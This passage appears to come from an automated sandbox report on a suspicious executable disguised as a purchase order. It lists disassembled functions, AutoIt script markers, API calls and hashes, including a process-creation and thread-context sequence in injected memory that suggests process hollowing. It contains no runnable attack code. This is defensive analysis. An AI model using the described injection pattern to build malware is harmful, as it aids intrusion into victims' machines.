                                  • _wcsncpy.LIBCMT ref: 004102ED
                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                  • _wcsncpy.LIBCMT ref: 00410340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                  • String ID: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                  • API String ID: 3170942423-2073737659
                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                  Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2219 401250-40125c 2220 401262-401293 call 412f40 call 401b80 2219->2220 2221 4012e8-4012ed 2219->2221 2226 4012d1-4012e2 KillTimer SetTimer 2220->2226 2227 401295-4012b5 2220->2227 2226->2221 2228 4012bb-4012bf 2227->2228 2229 4272ec-4272f2 2227->2229 2230 4012c5-4012cb 2228->2230 2231 42733f-427346 2228->2231 2232 4272f4-427315 Shell_NotifyIconW 2229->2232 2233 42731a-42733a Shell_NotifyIconW 2229->2233 2230->2226 2234 427393-4273b4 Shell_NotifyIconW 2230->2234 2235 427348-427369 Shell_NotifyIconW 2231->2235 2236 42736e-42738e Shell_NotifyIconW 2231->2236 2232->2226 2233->2226 2234->2226 2235->2226 2236->2226
                                  APIs
                                    • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                    • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                  • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                  • String ID:
                                  • API String ID: 3300667738-0
                                  • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                  • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                  Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: QueryValue$CloseOpen
                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                  • API String ID: 1586453840-614718249
                                  • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                  • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                  Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$CreateShow
                                  • String ID: AutoIt v3$edit
                                  • API String ID: 1584632944-3779509399
                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                  Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorLast
                                  • String ID: NULL Pointer assignment$Not an Object type
                                  • API String ID: 2487901850-572801152
                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                  Function 04002420 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 04002310: Sleep.KERNELBASE(000001F4), ref: 04002321
                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400255E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1475151647.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4000000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateFileSleep
                                  • String ID: TTA0CXXHS5PXR6SG4S37XYASD4RUXY
                                  • API String ID: 2694422964-3187222419
                                  • Opcode ID: 0ef46986fa74fa09f499f018dc56d8a293bd0a83c87969e3aa18309c99d70689
                                  • Instruction ID: f3f023e50ea6455221ff1626207d85168f8ce6b1b5cb5c12bf651af4ac130df4
                                  • Opcode Fuzzy Hash: 0ef46986fa74fa09f499f018dc56d8a293bd0a83c87969e3aa18309c99d70689
                                  • Instruction Fuzzy Hash: 38617030D04288DAEF11DBF4C858BDEBBB89F15305F048199E6587B2C1C7B91B49CBA6
                                  Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • _wcsncpy.LIBCMT ref: 00401C41
                                  • _wcscpy.LIBCMT ref: 00401C5D
                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                  • String ID: Line:
                                  • API String ID: 1874344091-1585850449
                                  • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                  • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                  • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                  • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                  Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Close$OpenQueryValue
                                  • String ID: Control Panel\Mouse
                                  • API String ID: 1607946009-824357125
                                  • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                  • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                  • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                  • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                  Function 04001310 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 04001ACB
                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04001B61
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04001B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1475151647.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4000000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                  • String ID:
                                  • API String ID: 2438371351-0
                                  • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                  • Instruction ID: 7428be119b929302807acd6e615bd22ed4048d822821e6170f8b4d879ffc9771
                                  • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                  • Instruction Fuzzy Hash: 1F62EA30A14658DBEB24CFA4C850BDEB376EF58304F1091A9D10DEB2D4E776AE81CB59
                                  Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                  • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                  • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                  • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                  Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$AllocClearCopyInitString
                                  • String ID:
                                  • API String ID: 2808897238-0
                                  • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                  • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                  • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                  • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                  Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                  • _free.LIBCMT ref: 004295A0
                                    • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                    • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                    • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                    • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                    • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                  • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                  • API String ID: 3938964917-666516263
                                  • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                  • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                  • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                  • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                  Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: Error:
                                  • API String ID: 4104443479-232661952
                                  • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                  • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                  • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                  • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                  Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                  Download Yara Rule
                                  APIs
                                  • 758ED0D0.COMDLG32(?), ref: 0042961B
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,0040F545,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,004A90E8,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Path$FullName_wcsncpy$DesktopFolderFromListMalloc
                                  • String ID: X$pWH
                                  • API String ID: 2653188779-941433119
                                  • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                  • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                  • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                  • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                  Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  Strings
                                  • C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, xrefs: 00410107
                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
